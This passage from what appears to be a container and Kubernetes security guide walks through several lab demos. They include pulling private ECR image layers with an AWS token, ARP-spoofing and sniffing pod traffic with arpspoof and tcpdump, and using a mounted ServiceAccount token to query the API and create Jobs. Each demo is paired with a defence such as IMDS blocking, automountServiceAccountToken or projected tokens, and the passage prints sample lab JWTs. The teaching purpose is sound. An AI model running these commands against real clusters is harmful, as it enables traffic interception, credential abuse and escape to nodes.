root@test:~# curl -H 'Accept: application/vnd.docker.distribution.manifest.v2+json' -k --user AWS:$TOKEN https://926292163423.dkr.ecr.ap-northeast-1.amazonaws.com/v2/mrtc0/test/manifests/latest
{
   "schemaVersion": 2,
   "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
   "config": {
      "mediaType": "application/vnd.docker.container.image.v1+json",
      "size": 1728,
      "digest": "sha256:0a8054f3ec507e056e6bc0a015d3a85678e4966cd9e1f18953311676ddf681fd"
   },
   "layers": [
      {
         "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "size": 2797541,
         "digest": "sha256:df20fa9351a15782c64e6dddb2d4a6f50bf6d3688060a34c4014b0d9a752eb4c"
      },
      {
         "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "size": 117,
         "digest": "sha256:a34b0c316d63ed56e3cc1a312826765097c78c747445fad0e14d82686cb5563a"
      }
   ]
}

root@test:~# curl -L -H 'Accept: application/vnd.docker.distribution.manifest.v2+json' -k --user AWS:$TOKEN https://926292163423.dkr.ecr.ap-northeast-1.amazonaws.com/v2/mrtc0/test/blobs/sha256:0a8054f3ec507e056e6bc0a015d3a85678e4966cd9e1f18953311676ddf681fd | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   127  100   127    0     0   2116      0 --:--:-- --:--:-- --:--:--  2116
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100  1728  100  1728    0     0  12083      0 --:--:-- --:--:-- --:--:-- 12083
{
  "architecture": "amd64",
  "config": {
    "Hostname": "",
    "Domainname": "",
    "User": "",
    "AttachStdin": false,
    "AttachStdout": false,
    "AttachStderr": false,
    "Tty": false,
    "OpenStdin": false,
    "StdinOnce": false,
    "Env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    ],
    "Cmd": [
      "/bin/sh"
    ],
    "ArgsEscaped": true,
    "Image": "sha256:a24bb4013296f61e89ba57005a7b3e52274d8edd3ae2077d04395f806b63d83e",
    "Volumes": null,
    "WorkingDir": "",
    "Entrypoint": null,
    "OnBuild": null,
    "Labels": null
  },
  "container_config": {
    "Hostname": "",
    "Domainname": "",
    "User": "",
    "AttachStdin": false,
    "AttachStdout": false,
    "AttachStderr": false,
    "Tty": false,
    "OpenStdin": false,
    "StdinOnce": false,
    "Env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    ],
    "Cmd": [
      "/bin/sh",
      "-c",
      "#(nop) ADD file:d579202c9c7308a756eac66a2b3be41424e5e92a6376dd3fcf059d57770aa10c in /secret.txt "
    ],
    "ArgsEscaped": true,
    "Image": "sha256:a24bb4013296f61e89ba57005a7b3e52274d8edd3ae2077d04395f806b63d83e",
    "Volumes": null,
    "WorkingDir": "",
    "Entrypoint": null,
    "OnBuild": null,
    "Labels": null
  },
  "created": "2020-11-23T13:50:04.0959713Z",
  "docker_version": "19.03.13",
  "history": [
    {
      "created": "2020-05-29T21:19:46.192045972Z",
      "created_by": "/bin/sh -c #(nop) ADD file:c92c248239f8c7b9b3c067650954815f391b7bcb09023f984972c082ace2a8d0 in / "
    },
    {
      "created": "2020-05-29T21:19:46.363518345Z",
      "created_by": "/bin/sh -c #(nop)  CMD [\"/bin/sh\"]",
      "empty_layer": true
    },
    {
      "created": "2020-11-23T13:50:04.0959713Z",
      "created_by": "/bin/sh -c #(nop) ADD file:d579202c9c7308a756eac66a2b3be41424e5e92a6376dd3fcf059d57770aa10c in /secret.txt "
    }
  ],
  "os": "linux",
  "rootfs": {
    "type": "layers",
    "diff_ids": [
      "sha256:50644c29ef5a27c9a40c393a73ece2479de78325cae7d762ef3cdc19bf42dd0a",
      "sha256:0e93ab7e92aa71e6ad2e6227fc001d8311e4c7827ef882bfe0fadffcfdf8b3e0"
    ]
  }
}

root@test:~# curl -L -H 'Accept: application/vnd.docker.distribution.manifest.v2+json' -k --user AWS:$TOKEN https://926292163423.dkr.ecr.ap-northeast-1.amazonaws.com/v2/mrtc0/test/blobs/sha256:a34b0c316d63ed56e3cc1a312826765097c78c747445fad0e14d82686cb5563a -o layer.tar.gz
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100   117  100   117    0     0    873      0 --:--:-- --:--:-- --:--:--   873
root@test:~# tar xvzf layer.tar.gz
secret.txt
root@test:~# cat secret.txt
this is secret
```
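
The `curl` steps above follow a fixed pattern: read the manifest, then request each digest under `/v2/<repository>/blobs/`. A sketch that derives those URLs from a manifest, assuming the schema version 2 layout shown above (`blob_urls` is a hypothetical helper name):

```python
import json
from typing import List


def blob_urls(registry: str, repository: str, manifest_json: str) -> List[str]:
    """List the blob URLs (image config first, then layers) named by a v2 manifest."""
    manifest = json.loads(manifest_json)
    digests = [manifest["config"]["digest"]]
    digests += [layer["digest"] for layer in manifest.get("layers", [])]
    return [f"https://{registry}/v2/{repository}/blobs/{digest}" for digest in digests]
```

The first URL returns the image config, whose `history` reveals the build steps; the remaining URLs return the gzip-compressed layer tarballs.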

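To prevent this kind of attack, EKS can also be configured so that containers that do not use hostNetwork cannot connect to IMDS.[^5]  
The configuration method depends on factors such as whether a custom launch template is used and whether the nodes are self-managed. In this case, adding the `--disable-pod-imds` flag when creating the node group with `eksctl create nodegroup` blocks access.  
Once access is blocked, a 401 is returned as follows.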

```shell
bash-5.0# curl -i http://169.254.169.254/
HTTP/1.1 401 Unauthorized
Content-Length: 0
Date: Mon, 23 Nov 2020 14:50:10 GMT
Server: EC2ws
Connection: close
Content-Type: text/plain
```

---

[^1]: https://cloud.google.com/kubernetes-engine/docs/concepts/cluster-trust
[^2]: https://kubernetes.io/docs/reference/access-authn-authz/certificate-signing-requests/#kubernetes-signers
[^3]: https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity
[^4]: https://cloud.google.com/kubernetes-engine/docs/how-to/shielded-gke-nodes
[^5]: https://docs.aws.amazon.com/eks/latest/userguide/best-practices-security.html


================================================
FILE: source/kubernetes/security/privileged-pod.md
================================================
# Pod Privileges and Escaping to the Node

As described in [Breakout to the Host](https://container-security.dev/security/breakout-to-host.html), a privileged container can escape to the host.  
In Kubernetes, this means escaping to the Node on which the Pod is scheduled.

## SecurityContext

With Docker, container privileges are configured through command-line options.  
For Kubernetes Pods, SecurityContext can be used to apply settings such as the following to a Pod or container.

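- DAC ... changes the user that runs the process and the group that owns volumes
- SELinux ... SELinux settings
- AppArmor ... AppArmor settings
- Privileged container ... whether the container runs as privileged or unprivileged
- Linux Capabilities ... Capabilities settings
- seccomp ... seccomp settings
- AllowPrivilegeEscalation ... controls whether a process can gain additional privileges
- readOnlyRootFilesystem ... makes the container's root filesystem read-only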

See the documentation for details on how each setting behaves.
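
As a rough illustration of how several of these settings combine, the following sketch builds a restrictive container-level `securityContext`. The field names are the Kubernetes API field names; the function name and the UID `1000` are assumptions chosen for the example, and real workloads may need a looser profile.

```python
import json


def restrictive_security_context(run_as_user: int = 1000) -> dict:
    """Build a container securityContext that switches off the risky defaults."""
    return {
        "runAsNonRoot": True,               # DAC: refuse to start as UID 0
        "runAsUser": run_as_user,           # DAC: hypothetical unprivileged UID
        "privileged": False,                # not a privileged container
        "allowPrivilegeEscalation": False,  # no additional privileges via setuid binaries
        "readOnlyRootFilesystem": True,     # root filesystem mounted read-only
        "capabilities": {"drop": ["ALL"]},  # start from an empty capability set
        "seccompProfile": {"type": "RuntimeDefault"},
    }


if __name__ == "__main__":
    print(json.dumps({"securityContext": restrictive_security_context()}, indent=2))
```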

## Capabilities

As described earlier, granting excessive Capabilities to a container can lead to a breakout.  
Let's check the default Capabilities of a Pod.

```shell
root@test:/# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
```

Checking with the `pscap` command shows that several Capabilities are granted.  
The most interesting of them is `CAP_NET_RAW`. It allows the use of raw sockets, which makes ARP spoofing and DNS spoofing possible.
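
When `pscap` is not installed, the same information can be read from the `CapEff` line of `/proc/<pid>/status`, which holds the effective capabilities as a hexadecimal bitmask. The sketch below decodes such a mask; the helper names are hypothetical, and the name table follows the bit numbering in the Linux `capability.h` header.

```python
from typing import List

# Capability names indexed by bit number (CAP_CHOWN = 0 ... CAP_CHECKPOINT_RESTORE = 40).
CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]


def effective_mask(status_text: str) -> int:
    """Extract the CapEff bitmask from the contents of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)
    raise ValueError("no CapEff line found")


def decode_capabilities(mask: int) -> List[str]:
    """Return the names of all capabilities whose bit is set in the mask."""
    return [name for bit, name in enumerate(CAP_NAMES) if mask & (1 << bit)]
```

The fourteen capabilities in the `pscap` output above correspond to the mask `0xa80425fb`; checking for `"net_raw"` in the decoded list tells you whether raw sockets are available.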

## Sniffing Pod-to-Pod Traffic with ARP Spoofing

Because raw sockets are available, traffic between Pods can be sniffed through ARP spoofing.  
Let's try it. First, create an nginx Pod that acts as the server and a client Pod that accesses it.

```shell
$ kubectl run --image=nginx:latest server
$ kubectl get pods -o wide
NAME       READY   STATUS    RESTARTS   AGE   IP            NODE       NOMINATED NODE   READINESS GATES
server     1/1     Running   0          15m   172.17.0.15   minikube   <none>           <none>

$ kubectl run --image=nicolaka/netshoot:latest --rm -it client -- bash -c 'while true; do curl http://172.17.0.15 ; sleep 5; done'

$ kubectl get pods -o wide
NAME       READY   STATUS    RESTARTS   AGE     IP            NODE       NOMINATED NODE   READINESS GATES
server     1/1     Running   0          3m      172.17.0.15   minikube   <none>           <none>
client     1/1     Running   0          2m30s   172.17.0.16   minikube   <none>           <none>
```

Then create a Pod for the attacker and run ARP spoofing with the `arpspoof` command.  
At the same time, inspect the traffic with `tcpdump`.

```shell
$ kubectl run --image=ubuntu:latest --rm -it attacker bash
root@attacker:/# apt update ; apt install -y dsniff tcpdump
root@attacker:/# arpspoof -t 172.17.0.16 172.17.0.15
```

```shell
$ kubectl exec -it attacker -- tcpdump -i any tcp -vv
    172.17.0.16.55080 > 172.17.0.15.80: Flags [P.], cksum 0x58b3 (incorrect -> 0x96e4), seq 0:75, ack 1, win 502, options [nop,nop,TS val 910579351 ecr 3251193240], length 75: HTTP, length: 75
        GET / HTTP/1.1
        Host: 172.17.0.15
        User-Agent: curl/7.71.1
        Accept: */*
```

As shown, the contents of the traffic were captured.

## DNS Spoofing

TBD


================================================
FILE: source/kubernetes/security/service-account.md
================================================
# Grant Least Privilege to ServiceAccounts

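The ServiceAccount token and certificate are mounted inside the Pod under `/var/run/secrets/kubernetes.io/serviceaccount/`.  
As a result, if a Pod is compromised, the attacker can operate on resources with the privileges of the mounted ServiceAccount. Following the principle of least privilege, grant a ServiceAccount only the permissions it needs.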

If no ServiceAccount is specified for a Pod, the token of the `default` ServiceAccount is mounted. Because no permissions are granted to it, it can do almost nothing.

```shell
bash-5.0# cd /var/run/secrets/kubernetes.io/serviceaccount/
bash-5.0# ls
ca.crt     namespace  token

bash-5.0# KUBE_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
bash-5.0# curl -sSk -H "Authorization: Bearer $KUBE_TOKEN" \
  https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT_443_TCP_PORT/api/v1/namespaces/default/pods/$HOSTNAME
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {

  },
  "status": "Failure",
  "message": "pods \"test\" is forbidden: User \"system:serviceaccount:lab:default\" cannot get resource \"pods\" in API group \"\" in the namespace \"default\"",
  "reason": "Forbidden",
  "details": {
    "name": "test",
    "kind": "pods"
  },
  "code": 403
}
```

Using the API that reports which actions the caller is allowed to perform, it can be confirmed that this ServiceAccount cannot `get` Pods.

```shell
curl -sSk -H "Authorization: Bearer $KUBE_TOKEN" \
     -d @- \
     -H "Content-Type: application/json" \
     -H 'Accept: application/json, */*' \
     -XPOST https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT_443_TCP_PORT/apis/authorization.k8s.io/v1/selfsubjectaccessreviews <<'EOF'
{
   "kind":"SelfSubjectAccessReview",
   "apiVersion":"authorization.k8s.io/v1",
   "metadata":{
      "creationTimestamp":null
   },
   "spec":{
      "resourceAttributes":{
         "namespace":"lab",
         "verb":"get",
         "resource":"pods"
      }
   },
   "status":{
   }
}
EOF

{
  "kind": "SelfSubjectAccessReview",
  "apiVersion": "authorization.k8s.io/v1",
  "metadata": {
    "creationTimestamp": null,
    "managedFields": [
      {
        "manager": "curl",
        "operation": "Update",
        "apiVersion": "authorization.k8s.io/v1",
        "time": "2020-11-23T02:39:02Z",
        "fieldsType": "FieldsV1",
        "fieldsV1": {"f:spec":{"f:resourceAttributes":{".":{},"f:namespace":{},"f:resource":{},"f:verb":{}}}}
      }
    ]
  },
  "spec": {
    "resourceAttributes": {
      "namespace": "lab",
      "verb": "get",
      "resource": "pods"
    }
  },
  "status": {
    "allowed": false
  }
}
```
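
The request body only needs `spec.resourceAttributes`, and the answer is in `status.allowed`. A small sketch of both sides, assuming the JSON shapes shown above (the helper names are hypothetical):

```python
import json


def self_subject_access_review(namespace: str, verb: str, resource: str, group: str = "") -> str:
    """Build the JSON body for a SelfSubjectAccessReview request."""
    attributes = {"namespace": namespace, "verb": verb, "resource": resource}
    if group:
        # Only needed for resources outside the core API group, e.g. "batch" for jobs.
        attributes["group"] = group
    body = {
        "kind": "SelfSubjectAccessReview",
        "apiVersion": "authorization.k8s.io/v1",
        "spec": {"resourceAttributes": attributes},
    }
    return json.dumps(body)


def is_allowed(response_json: str) -> bool:
    """Read status.allowed from the API server's response."""
    return bool(json.loads(response_json).get("status", {}).get("allowed", False))
```

The string returned by `self_subject_access_review("lab", "get", "pods")` can be sent as the POST body in place of the heredoc in the `curl` command above.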

If the mounted token belongs to a ServiceAccount that is allowed to create Jobs, as in the following example, Pods can be created through a Job.  

```yaml
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: runner
  namespace: lab

---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: job-runner
  namespace: lab
rules:
  - apiGroups: ["batch", "extensions"]
    resources: ["jobs", "jobs/status"]
    verbs: ["*"]
  - apiGroups: [""]
    resources: ["pods", "pods/binding", "pods/log", "pods/status"]
    verbs: ["get", "list"]

---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: job-runner
  namespace: lab
subjects:
- kind: ServiceAccount
  name: runner
  namespace: lab
roleRef:
  kind: Role
  name: job-runner
  apiGroup: rbac.authorization.k8s.io
```

```shell
bash-5.0# curl -sSk -H "Authorization: Bearer $KUBE_TOKEN" -H "Content-Type: application/json" -H 'Accept: application/json, */*' -d @- https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT_443_TCP_PORT/apis/batch/v1/namespaces/lab/jobs <<'EOF'
{
   "apiVersion":"batch/v1",
   "kind":"Job",
   "metadata":{
      "name":"sleep-job",
      "namespace":"lab"
   },
   "spec":{
      "backoffLimit":4,
      "template":{
         "spec":{
            "containers":[
               {
                  "command":[
                    "sleep",
                    "100"
                  ],
                  "image":"alpine:latest",
                  "name":"sleep-job"
               }
            ],
            "restartPolicy":"Never"
         }
      }
   }
}
EOF
```

For example, if hostPath mounts are not restricted, this can be used to escape to the node on which the Pod is scheduled.  
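
Permissions that create Pods indirectly are easy to overlook when reviewing a Role. The following sketch flags such rules. It is a simplification: it ignores `apiGroups` and verbs such as `update` or `patch`, and the resource list and function name are assumptions made for the example.

```python
from typing import Dict, List

# Resources whose creation results in Pods being scheduled (illustrative list).
POD_CREATING_RESOURCES = {
    "pods", "jobs", "cronjobs", "deployments", "daemonsets",
    "statefulsets", "replicasets", "replicationcontrollers",
}
CREATE_VERBS = {"create", "*"}


def workload_creation_paths(rules: List[Dict]) -> List[str]:
    """Return the Pod-creating resources that the given RBAC rules allow to be created."""
    found = set()
    for rule in rules:
        if not CREATE_VERBS & set(rule.get("verbs", [])):
            continue
        resources = set(rule.get("resources", []))
        if "*" in resources:
            found |= POD_CREATING_RESOURCES
        else:
            found |= resources & POD_CREATING_RESOURCES
    return sorted(found)
```

Applied to the `job-runner` Role above, this reports `jobs`, even though the rule for `pods` itself only grants `get` and `list`.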

## Avoid Mounting the Token with `automountServiceAccountToken`

If a Pod does not need the ServiceAccount token mounted, specify `automountServiceAccountToken: false`.

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: pod
spec:
  serviceAccountName: runner
  automountServiceAccountToken: false
  ...
```

`automountServiceAccountToken` can also be specified on the ServiceAccount itself.

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: runner
  namespace: lab
automountServiceAccountToken: false
```

When it is set on the ServiceAccount, the token is not mounted unless the Pod explicitly specifies `automountServiceAccountToken: true`.  
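
The interaction between the two settings can be summarized as: the Pod-level value wins when present, otherwise the ServiceAccount-level value applies, and the token is mounted when neither is set. A sketch of that rule, with `None` standing for "not specified" (the function name is hypothetical):

```python
from typing import Optional


def token_is_mounted(pod_setting: Optional[bool], service_account_setting: Optional[bool]) -> bool:
    """Resolve whether the ServiceAccount token ends up mounted in the Pod."""
    if pod_setting is not None:
        return pod_setting              # the Pod spec takes precedence
    if service_account_setting is not None:
        return service_account_setting  # fall back to the ServiceAccount
    return True                         # default when neither is specified
```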

## Using TokenRequestProjection

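TokenRequestProjection makes it possible to issue ServiceAccount tokens dynamically and mount them into a Pod.[^1]  
This allows an expiration time to be set on the ServiceAccount token while the token inside the Pod is refreshed automatically.  
In addition, the token becomes unusable once the Pod is deleted, which reduces the impact if a token leaks.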

For example, applying the following manifest creates a Pod that mounts a ServiceAccount token with a 10-minute lifetime that is refreshed automatically.

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: sleep
spec:
  serviceAccountName: runner
  containers:
  - name: alpine
    image: alpine:latest
    args:
    - tail
    - -f
    - /dev/null
    volumeMounts:
    - mountPath: /var/run/secrets/tokens
      name: token
  volumes:
  - name: token
    projected:
      sources:
      - serviceAccountToken:
          path: token
          expirationSeconds: 600
          audience: api
```

Run the Pod and check again after about 10 minutes to confirm that the token has been refreshed.

```shell
/run/secrets/tokens # date
Mon Nov 23 08:17:14 UTC 2020
/run/secrets/tokens # cat token
eyJhbGciOiJSUzI1NiIsImtpZCI6IkRqWFZUR3dMZ2tsbXZyUHVGZ01nRHc5d2Q3U3laRjZVRXFHTzQ5eHZaQjAifQ.eyJhdWQiOlsiYXBpIl0sImV4cCI6MTYwNjExOTcxOCwiaWF0IjoxNjA2MTE5MTE4LCJpc3MiOiJrdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJsYWIiLCJwb2QiOnsibmFtZSI6InNsZWVwIiwidWlkIjoiZDQ4N2M5ODQtNzMxNC00MWZmLThjZTUtNWUxNGIyZDc0OGFmIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJydW5uZXIiLCJ1aWQiOiIyYTNjYjZiZi1lOGE5LTRhNDAtYWFlMC1lODMyMjMwNjI5MzIifX0sIm5iZiI6MTYwNjExOTExOCwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmxhYjpydW5uZXIifQ.Sr6ZkbaoFlX4QcUO53gloBjkT_hqKYg1wh13qS6lAX1INUi7tVEYWCjKw3RvkocNIeFIa7WWzlgD66vdXT2OV63yd2Zxovndyx68_PSqbYlhluASTiOasT24JGqqN7iq2uwp8hrw5YTjyEenLQhAJ1qC1Xzgh5NQYxcLYErk2NQVFKQzbhrHVZvtl0NlW3lyNmp6beCy1_jZqccyOTWK8p_D0HXRGkSHo1ExYRYqtbIg-f6j61-NwWU0duUbI_i-vRFO7KefW4onv2RBRiOun91by_xCziAYXWch6SFYWSIbxaFvk-jb6OixtMgUI8q514AWb2SGoWQ0xBvAQhikhg

/run/secrets/tokens # date
Mon Nov 23 08:29:03 UTC 2020
/run/secrets/tokens # cat token
eyJhbGciOiJSUzI1NiIsImtpZCI6IkRqWFZUR3dMZ2tsbXZyUHVGZ01nRHc5d2Q3U3laRjZVRXFHTzQ5eHZaQjAifQ.eyJhdWQiOlsiYXBpIl0sImV4cCI6MTYwNjEyMDIwNCwiaWF0IjoxNjA2MTE5NjA0LCJpc3MiOiJrdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJsYWIiLCJwb2QiOnsibmFtZSI6InNsZWVwIiwidWlkIjoiZDQ4N2M5ODQtNzMxNC00MWZmLThjZTUtNWUxNGIyZDc0OGFmIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJydW5uZXIiLCJ1aWQiOiIyYTNjYjZiZi1lOGE5LTRhNDAtYWFlMC1lODMyMjMwNjI5MzIifX0sIm5iZiI6MTYwNjExOTYwNCwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmxhYjpydW5uZXIifQ.SgObuy7ql-kXI-P6uNY6hmUdONSZJfPo7dvxukU7kKFCCIvQcNnWYxzOoo2B_XK4_u7atAGtqWSe9MBG6rJpT73lOjSmGMOeqGVKAe6UTpbnbmS9DO6sVnwCNOCRgs_muwTyF6km66ZxvAm866V5kUIoX407Aa5I-KWZk-8OKT9Db6QKgKBqA9lPKX_Ii-AYBVi_kKB1wR70zxNW_VOapMh9oGXU-ymzGDfJb0Cdo8wJJabpgbIWVlEO7E9417gf6w90U_H5b4mOdGsjWs0JtgVXw3sGBflHUrU0AwYUXI6a8B_HFbS4Q0ChYMZCm5amFQvC6lZL5OsILnaG9JwILg
```
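To see the lifetime that `expirationSeconds: 600` produces, the payload of a projected token can be decoded. The following is a minimal sketch in Python. `decode_jwt_payload` and `make_sample_token` are hypothetical helper names, the sample token is built locally and is unsigned, and only its `iat` / `exp` values are taken from the payload of the first token shown above. The sketch does not verify signatures.

```python
import base64
import json


def decode_jwt_payload(token: str) -> dict:
    """Decode the (unverified) payload segment of a JWT."""
    payload_b64 = token.split(".")[1]
    # JWTs use unpadded base64url; restore the padding before decoding.
    payload_b64 += "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(payload_b64))


def make_sample_token(claims: dict) -> str:
    """Build an unsigned, illustrative token (hypothetical helper, not a real credential)."""
    def b64(obj: dict) -> str:
        raw = json.dumps(obj).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    return f"{b64({'alg': 'none'})}.{b64(claims)}.signature"


# iat / exp copied from the payload of the first token above.
sample = make_sample_token({"aud": ["api"], "iat": 1606119118, "exp": 1606119718})
claims = decode_jwt_payload(sample)
print(claims["exp"] - claims["iat"])  # 600 (seconds)
```

Inside the Pod, the same function could be applied to the contents of `/var/run/secrets/tokens/token` to compare `exp` before and after a refresh.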

Let's also confirm that the old token can no longer be used.

```shell
bash-5.0# KUBE_TOKEN=eyJhbGciOiJSUzI1NiIsImtpZCI6IkRqWFZUR3dMZ2tsbXZyUHVGZ01nRHc5d2Q3U3laRjZVRXFHTzQ5eHZaQjAifQ.eyJhdWQiOlsiYXBpIl0sImV4cCI6MTYwNjExOTcxOCwiaWF0IjoxNjA2MTE5MTE4LCJpc3MiOiJrdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJsYWIiLCJwb2QiOnsibmFtZSI6InNsZWVwIiwidWlkIjoiZDQ4N2M5ODQtNzMxNC00MWZmLThjZTUtNWUxNGIyZDc0OGFmIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJydW5uZXIiLCJ1aWQiOiIyYTNjYjZiZi1lOGE5LTRhNDAtYWFlMC1lODMyMjMwNjI5MzIifX0sIm5iZiI6MTYwNjExOTExOCwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmxhYjpydW5uZXIifQ.Sr6ZkbaoFlX4QcUO53gloBjkT_hqKYg1wh13qS6lAX1INUi7tVEYWCjKw3RvkocNIeFIa7WWzlgD66vdXT2OV63yd2Zxovndyx68_PSqbYlhluASTiOasT24JGqqN7iq2uwp8hrw5YTjyEenLQhAJ1qC1Xzgh5NQYxcLYErk2NQVFKQzbhrHVZvtl0NlW3lyNmp6beCy1_jZqccyOTWK8p_D0HXRGkSHo1ExYRYqtbIg-f6j61-NwWU0duUbI_i-vRFO7KefW4onv2RBRiOun91by_xCziAYXWch6SFYWSIbxaFvk-jb6OixtMgUI8q514AWb2SGoWQ0xBvAQhikhg

bash-5.0# curl -sSk -H "Authorization: Bearer $KUBE_TOKEN" https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT_443_TCP_PORT/api/v1/namespaces/lab/pods/$HOSTNAME
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {

  },
  "status": "Failure",
  "message": "Unauthorized",
  "reason": "Unauthorized",
  "code": 401
}
```

After the Pod is deleted, the token that had been valid can no longer be used either.

```shell
$ kubectl delete -f test.pod

bash-5.0# curl -sSk -H "Authorization: Bearer $KUBE_TOKEN" https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT_443_TCP_PORT/api/v1/namespaces/lab/pods/$HOSTNAME
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {

  },
  "status": "Failure",
  "message": "Unauthorized",
  "reason": "Unauthorized",
  "code": 401
}
```


---

[^1]: https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#service-account-token-volume-projection


================================================
FILE: source/lsm/apparmor.md
================================================
# AppArmor

AppArmor is one of the Linux Security Modules (LSM) and implements mandatory access control (MAC).  
A profile can be applied per application to restrict access to specific files and the invocation of system calls.

For example, after creating and enabling the following profile, `/home/ubuntu/mybash` can only read `/etc/hosts` and cannot read or write other files.

```sh
$ cat /etc/apparmor.d/test
#include <tunables/global>

profile test /home/ubuntu/mybash {
    #include <abstractions/base>

    /etc/hosts r,
    /usr/bin/cat ix,
}

$ sudo apparmor_parser -r -W /etc/apparmor.d/test

$ ./mybash
mybash-5.0$ cat /etc/passwd
cat: /etc/passwd: Permission denied
mybash-5.0$ cat /etc/hosts
# Your system has configured 'manage_etc_hosts' as True.
...
127.0.0.1 localhost
...

mybash-5.0$ echo test >> /etc/hosts
mybash: /etc/hosts: Permission denied
```

Docker containers are also confined by a profile named `docker-default`, which serves as one layer of defense in depth.[^1]

```sh
$ sudo aa-status | grep docker
   docker-default
```
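From inside a process, the applied profile can also be read from `/proc/self/attr/current`, which on AppArmor systems contains either `unconfined` or a label such as `docker-default (enforce)`. The following is a minimal sketch for parsing that label; `parse_apparmor_label` is a hypothetical helper name and the sample strings are illustrative.

```python
def parse_apparmor_label(raw: str):
    """Split an AppArmor confinement label into (profile, mode)."""
    label = raw.strip()
    if label == "unconfined":
        return ("unconfined", None)
    # Confined processes report "<profile> (<mode>)".
    if label.endswith(")") and " (" in label:
        profile, mode = label[:-1].rsplit(" (", 1)
        return (profile, mode)
    return (label, None)


print(parse_apparmor_label("docker-default (enforce)\n"))
print(parse_apparmor_label("unconfined\n"))
```

In a container, passing `open("/proc/self/attr/current").read()` to the function shows whether the process is actually confined.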

For example, even when `CAP_SYS_ADMIN` is granted, AppArmor prevents the `mount` command from succeeding. Once AppArmor is disabled the mount succeeds, which confirms that AppArmor acts as the last line of defense.

```sh
$ docker container run --rm -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu:latest bash
root@85c7ea124688:/# mkdir a; mkdir b; mount --bind a b
mount: /b: bind /a failed.

$ docker container run --rm -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu:latest bash
root@110e911e07bc:/# mkdir a; mkdir b; mount --bind a b
root@110e911e07bc:/#
```

By creating a custom profile tailored to the application running in the container, you can harden the container further.

---

[^1]: https://github.com/moby/moby/blob/master/contrib/apparmor/template.go


================================================
FILE: source/namespace/README.md
================================================
# Namespace

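Linux Namespaces are one of the cornerstones of isolation from the host.  
Here, a Linux Namespace is referred to simply as a Namespace.

Namespaces are a Linux kernel feature that separates the resources seen by processes inside a Namespace from those of the host.  
Giving each container its own Namespaces isolates it from the host and from other containers.

As of Linux 5.9, there are the following eight Namespaces.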

| Namespace | Description |
|:---------:|:----:|
| Cgroup | Isolates the cgroup root directory (since Linux 4.6) |
| IPC | Isolates System V IPC and POSIX message queues |
| Network | Isolates network devices, addresses, and so on |
| Mount | Isolates mount points (file systems) |
| PID | Isolates process IDs (since Linux 2.6.24) |
| Time | Isolates some of the system clocks (since Linux 5.6) |
| User | Isolates UIDs / GIDs (since Linux 3.8) |
| UTS | Isolates the hostname |

For example, inside a newly created container you cannot see the host's processes, and the hostname differs from the host's.  
These are implemented with Namespaces.

```
root@3a7669ccdce1:/# hostname
3a7669ccdce1
root@3a7669ccdce1:/# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0   4108  3440 pts/0    Ss   04:04   0:00 bash
